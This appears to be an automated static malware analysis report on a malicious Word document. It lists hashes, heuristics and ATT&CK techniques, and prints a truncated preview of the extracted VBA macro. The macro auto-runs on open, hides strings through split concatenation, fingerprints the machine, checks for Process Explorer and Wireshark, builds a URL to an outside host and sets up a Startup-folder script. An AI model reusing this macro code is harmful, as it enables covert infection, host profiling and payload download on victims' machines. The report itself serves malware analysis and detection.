Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a56740dc2125dbf6…

MALICIOUS

Office (OLE)

Size: 5.37 MB
Created: 2020-02-17 16:59:00
Authoring application: Microsoft Office Word
First seen: 2020-07-24
MD5: 50ee3e9ee5cebd228b29bca72c311133
SHA-1: 53ca3b0ee9efa92538795c33040ecb3eac117c86
SHA-256: a56740dc2125dbf6f098422324839607e81dcf1e9ba4d0b38f171e3f9e446bc1
Risk score: 310

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample contains VBA macros that are automatically executed upon opening the document, as indicated by the Document_Open and p-code auto-exec firings. The macros utilize CreateObject and GetObject to instantiate WScript.Shell and WMI objects, specifically targeting Win32_Process to launch new processes. The script also attempts to construct a URL starting with 'http://kr' which likely serves as a download source for a secondary payload. The obfuscation technique of splitting string literals to reassemble API names like 'WScript.Shell' is also noted.

Heuristics 9

  • VBA macros detected [medium] OLE_VBA_MACROS (7 related findings)
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher [critical] OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Document_Open macro [high] OLE_VBA_DOCOPEN
  • CreateObject call [high] OLE_VBA_CREATEOBJ
  • GetObject call [high] OLE_VBA_GETOBJ
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs found in document text (OLE body):
    • http://ns.adobe.com/xap/1.0/
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://ns.adobe.com/tiff/1.0/
    • http://ns.microsoft.com/photo/1.0/
    • http://ns.adobe.com/xap/1.0/mm/
    • http://ns.adobe.com/exif/1.0/
    • http://ns.adobe.com/camera-raw-settings/1.0/
    • http://ns.adobe.com/photoshop/1.0/
    • http://ns.adobe.com/xap/1.0/rights/
    • http://purl.org/dc/elements/1.1/
    • http://schemas.openxmlformats.org/drawingml/2006/main
    All of these are XML namespace URIs from embedded image metadata (XMP/RDF, EXIF, Dublin Core) and DrawingML markup, not network destinations; the download URL the macro builds at runtime is assembled from split literals and system data, so it does not appear in this static list.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 24413 bytes
SHA-256: 264bf5dc5419e87c14e716b75e00c68eca0fadfca16833e90840ba19263d6e0a
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim bAhhm
Set bAhhm = CreateObject("" + "" + "W" + "" + "Sc" + "" + "r" + "ip" + "" + "t" + "." + "" + "S" + "h" + "el" + "" + "l")
Set WNetworkLib = CreateObject("" + "W" + "" + "S" + "cr" + "" + "ip" + "t" + "." + "Ne" + "" + "t" + "w" + "or" + "k")
Dim xyAlj, gzDFG
Set izbIj = CreateObject("S" + "" + "c" + "ri" + "pt" + "" + "ing" + "." + "" + "F" + "" + "i" + "l" + "eS" + "" + "ys" + "te" + "mO" + "" + "bj" + "e" + "ct")
bxmuG = Environ("H" + "" + "OME" + "DR" + "IV" + "" + "E")
cgBEz = Environ("C" + "" + "OM" + "PU" + "" + "TE" + "RN" + "" + "A" + "ME")
Set xyAlj = CreateObject("" + "" + "S" + "cr" + "" + "i" + "p" + "ti" + "" + "ng" + "" + "." + "F" + "il" + "" + "eS" + "" + "ys" + "te" + "mOb" + "" + "je" + "ct").GetDrive(bxmuG)
gApkx = Hex(xyAlj.SerialNumber)
Dim dmxpc, pYTeFm, nIsByC, GHdnd, vxEoh, icopg, wDyry
dmxpc = cgBEz & "_" & gApkx
Set xPEMcFXoxr = GetObject("" + "wi" + "" + "nm" + "gm" + "" + "ts" + ":" + "/" + "/" & "." & "/" + "ro" + "" + "o" + "t" + "/" + "ci" + "" + "m" + "v2" + "" + "")
Dim JjgiFELAVAh
  Set bcSbGOPkCeE = xPEMcFXoxr.ExecQuery("Se" + "" + "le" + "ct" + " *" + " fr" + "" + "om" + " Wi" + "n32" + "_B" + "" + "IO" + "S" + " wh" + "er" + "e" + " Pri" + "" + "mar" + "yBI" + "" + "OS " + "=" + " t" + "ru" + "" + "e", , 48)
For Each qVHlFWBsbAU In bcSbGOPkCeE
    ChqvzIEJeMJ = ChqvzIEJeMJ & qVHlFWBsbAU.Manufacturer & "-" & qVHlFWBsbAU.Version
Next
gzDFG = "ht" + "" + "t" + "p" + ":" + "/" + "/kristoffer.hopto.org/" + "" & dmxpc + "/" + ChqvzIEJeMJ + "/"
Dim nZDnQAXhNH()
Dim fIzITfFqmE, DUGbvM
On Error Resume Next
Do
DUGbvM = DUGbvM + 1
fIzITfFqmE = bAhhm.RegRead("HK" + "" + "C" + "U" + "\" + "Ke" + "" + "yb" + "oa" + "" + "rd" + " " + "La" + "you" + "" + "t\" + "" + "Pr" + "elo" + "" + "ad" + "\" + "" & DUGbvM)
If Err.Number = 0 Then
ReDim Preserve nZDnQAXhNH(DUGbvM - 1)
nZDnQAXhNH(DUGbvM - 1) = fIzITfFqmE
Else
Exit Do
End If
Loop
On Error GoTo 0
Dim HDHhHDlczO()
ReDim HDHhHDlczO(UBound(nZDnQAXhNH))
For DUGbvM = 0 To UBound(nZDnQAXhNH)
HDHhHDlczO(DUGbvM) = bAhhm.RegRead("HK" + "" + "LM" + "\" + "SY" + "" + "ST" + "EM\" + "Cur" + "ren" + "" + "tCon" + "tro" + "" + "lSe" + "t\" + "Co" + "" + "ntr" + "ol\" + "Key" + "boa" + "rd La" + "yo" + "ut" + "\Do" + "sKe" + "ybC" + "ode" + "s" + "\" & nZDnQAXhNH(DUGbvM))
gzDFG = gzDFG + "_" + HDHhHDlczO(DUGbvM)
Next
Set bcSbGOPkCeE = xPEMcFXoxr.ExecQuery("Se" + "" + "le" + "ct" + " *" + " fr" + "om" + " Wi" + "" + "n32" + "_Pr" + "oc" + "es" + "" + "s")
For Each qVHlFWBsbAU In bcSbGOPkCeE
If qVHlFWBsbAU.Name = "p" + "r" + "" + "oc" + "ex" + "" + "p" + "." + "e" + "" + "x" + "e" Then
gzDFG = gzDFG + "_!PExp"
End If
If qVHlFWBsbAU.Name = "w" + "" + "ir" + "" + "es" + "har" + "" + "k" + "." + "ex" + "" + "e" Then
gzDFG = gzDFG + "_!WShark"
End If
Next
gzDFG = gzDFG + "/i" + "ma" + "" + "g" + "e" + "18" + "." + "p" + "" + "h" + "p"
gzDFG = Replace(gzDFG, " ", "")
pYTeFm = Environ("A" + "" + "PP" + "" + "DA" + "T" + "" + "A" + "")
mlvVGpLJGOB = pYTeFm + "" + "" + "\" + "Mi" + "" + "cr" + "os" + "" + "of" + "t" + "\" + "" + "Wi" + "nd" + "" + "o" + "w" + "s" + "" + ""
nIsByC = mlvVGpLJGOB + "\""+FOjIeH+""" + "." + "" + "ex" + "" + "e" + ""
GHdnd = mlvVGpLJGOB + "\""+ FOjIeH +""" + "." + "t" + "" + "" + "xt" + ""
vxEoh = mlvVGpLJGOB + "" + "\" + "" + "St" + "" + "a" + "r" + "t" + " M" + "en" + "" + "u" + "\" + "Pr" + "" + "og" + "ra" + "ms" + "" + "\" + "St" + "ar" + "tu" + "" + "p" + "\" + """+ FOjIeH +""" + "" + "." + "vb" + "" + "s" + ""
wDyry = mlvVGpLJGOB + "" + "" + "\" + "S" + "" + "ta" + "" + "rt" + " " + "M" + "" + "en" + "u" + "\" + "" + "Pr" + "ogr" + "" + "am" + "s" + "\" + "S" + "ta" + "" + "rt" + "up" + "\" + "im" + "" + "a" + "ge" + "" + "." + "vb" + "" + "s" + ""

... (truncated)